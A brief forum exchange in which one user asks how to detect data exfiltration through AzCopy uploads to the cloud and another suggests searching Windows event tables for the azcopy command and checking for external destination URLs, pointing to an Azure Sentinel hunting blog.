Jun 19 2021 11:12 AM
What are the best ways to monitor for this type of event Exfiltrating data by transfering it to the cloud with Azcopy – Microsoft 365 Security (m365internals... ?
Jun 20 2021 09:12 AM
@Dean Gross I haven't' actually tried this but I would think you could search the Event and SecurityEvent tables for the azcopy command and then filter based on the file you are looking for. Of course, a smart person would rename the file before trying to upload it so you may want to see if the URL it is sending the data to is external to your company.
Take a look at this blog post to give you an idea on how to do this: Monitor and Hunting P0w3rSh3LL with Azure Sentinel (eshlomo.us)